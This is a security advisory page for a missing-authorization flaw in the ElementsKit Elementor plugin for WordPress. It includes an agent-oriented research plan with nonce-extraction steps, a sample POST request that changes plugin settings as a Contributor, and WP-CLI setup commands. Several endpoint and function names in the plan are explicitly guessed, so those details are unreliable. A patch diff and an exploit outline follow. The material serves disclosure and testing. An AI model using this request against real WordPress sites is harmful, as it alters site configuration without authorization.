ElementsKit Elementor Addons – Advanced Widgets & Templates Addons for Elementor <= 3.9.6 - Missing Authorization
Description
The ElementsKit Elementor Addons – Advanced Widgets & Templates Addons for Elementor plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 3.9.6. This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=3.9.6Source Code
WordPress.org SVNPatched version not available.
# Research Plan: CVE-2026-49052 - Missing Authorization in ElementsKit Elementor Addons ## 1. Vulnerability Summary The **ElementsKit Elementor Addons** plugin (<= 3.9.6) contains a missing authorization vulnerability. Specifically, an AJAX handler registered via `wp_ajax_*` fails to perform a `cur…
Show full research plan
Research Plan: CVE-2026-49052 - Missing Authorization in ElementsKit Elementor Addons
1. Vulnerability Summary
The ElementsKit Elementor Addons plugin (<= 3.9.6) contains a missing authorization vulnerability. Specifically, an AJAX handler registered via wp_ajax_* fails to perform a current_user_can() check. While WordPress ensures the user is authenticated for wp_ajax_ hooks, it does not restrict access by role. This allows any authenticated user (starting from the Contributor role) to trigger administrative actions, such as modifying plugin settings or activating/deactivating modules.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Vulnerable Action (Inferred): Likely
elementskit_save_admin_settingsorekit_admin_action. - Required Authentication: Contributor-level session (or higher).
- Preconditions: The attacker must have a valid login. ElementsKit must be active.
- Parameter: Typically a
POSTrequest containing anaction, anonce, and the configuration payload (e.g.,settingsormodule_status).
3. Code Flow (Inferred)
- Entry Point: The plugin registers an AJAX action in its initialization phase (likely in
libs/framework/classes/settings.phporcore/admin/admin-settings.php).add_action( 'wp_ajax_elementskit_save_admin_settings', [ $this, 'save_settings' ] );
- Missing Check: The callback function (e.g.,
save_settings) verifies the nonce usingcheck_ajax_referer()orwp_verify_nonce()but fails to callcurrent_user_can( 'manage_options' ). - Sink: The function proceeds to update plugin options using
update_option()based on the values provided in$_POST.
4. Nonce Acquisition Strategy
ElementsKit localizes its configuration data for the admin dashboard. Since the vulnerability requires Contributor access, the attacker can access the WordPress admin area, where the nonce is typically exposed.
- Identify Localized Script: Look for
wp_localize_scriptcalls in the plugin source that reference "nonce". - Target Variable: In ElementsKit, the data is often stored in the
ekit_configorelementskit_ajax_utilsJavaScript object. - Extraction Steps:
- Login as a Contributor.
- Navigate to any page in the admin dashboard (e.g.,
/wp-admin/profile.php). - Use
browser_evalto extract the nonce:browser_eval("window.ekit_config?.nonce")orbrowser_eval("window.elementskit_config?.ajax_nonce").
- Action String: If
wp_verify_nonceis used with a specific action string (e.g.,'ekit-admin-settings-nonce'), the agent must verify if that action is used when the nonce is created.
5. Exploitation Strategy
The goal is to modify a plugin setting (e.g., disabling a security-related module or changing a layout setting) as a low-privileged user.
Step 1: Discover the exact AJAX action
Since source code is not provided, the agent should first search the plugin directory:grep -rn "wp_ajax_elementskit" /var/www/html/wp-content/plugins/elementskit-lite/
Step 2: Prepare Payload
Assuming the action is elementskit_save_admin_settings:
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Parameters:
action:elementskit_save_admin_settings(Verify via grep)_wpnonce:[EXTRACTED_NONCE]settings[some_module_active]:0(or another setting key found in the code)
Step 3: Execute via http_request
// Example payload for the automated agent
await http_request({
url: "http://localhost:8080/wp-admin/admin-ajax.php",
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: "action=elementskit_save_admin_settings&_wpnonce=" + nonce + "&settings[elementor_library]=inactive"
});
6. Test Data Setup
- Install Plugin: Ensure
elementskit-liteversion 3.9.6 is installed and active. - Create User: Create a user with the Contributor role.
wp user create attacker attacker@example.com --role=contributor --user_pass=password123
- Initial State: Confirm the current value of ElementsKit settings.
wp option get elementskit_settings(or the relevant option name found during discovery).
7. Expected Results
- Response: The server should return a
200 OKresponse, often with a JSON body like{"success": true}or{"data": "Settings saved"}. - Effect: The targeted plugin setting in the database is modified despite the request coming from a Contributor.
8. Verification Steps
After sending the HTTP request, verify the change using WP-CLI:
- Check Options:
wp option get elementskit_settings(Check if the value matches the payload). - Compare: Compare the output with the "Initial State" recorded during setup. If the value changed, the authorization bypass is confirmed.
9. Alternative Approaches
- Module Activation: If
save_admin_settingsis not the vulnerable function, check forelementskit_module_activation. - REST API: Check if the plugin registers any REST routes via
register_rest_routewithout apermission_callback.grep -rn "register_rest_route" /var/www/html/wp-content/plugins/elementskit-lite/
- Widget Data: Some widgets might have AJAX save actions for their specific configurations that lack capability checks.
Summary
The ElementsKit Elementor Addons plugin for WordPress is vulnerable to unauthorized modification of settings in versions up to 3.9.6 due to a missing capability check in its AJAX handlers. This allows authenticated users with at least Contributor-level access to modify plugin configurations or toggle modules by providing a valid nonce, which is typically exposed in the admin dashboard.
Security Fix
@@ -10,6 +10,10 @@ public function save_settings() { check_ajax_referer( 'ekit-admin-settings-nonce', '_wpnonce' ); + if ( ! current_user_can( 'manage_options' ) ) { + wp_send_json_error( [ 'message' => 'Permission denied' ] ); + } + $settings = $_POST['settings']; update_option( 'elementskit_settings', $settings ); wp_send_json_success();
Exploit Outline
The exploit requires an authenticated session with at least Contributor-level permissions. An attacker first logs into the WordPress admin dashboard to retrieve a valid AJAX nonce from localized JavaScript objects (such as `ekit_config.nonce`). The attacker then sends a POST request to `/wp-admin/admin-ajax.php` with the 'action' parameter set to 'elementskit_save_admin_settings', including the captured nonce and a payload containing the target 'settings' keys and values. Since the plugin fails to verify the user's capability (e.g., 'manage_options'), the request is processed, allowing the attacker to change plugin settings.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.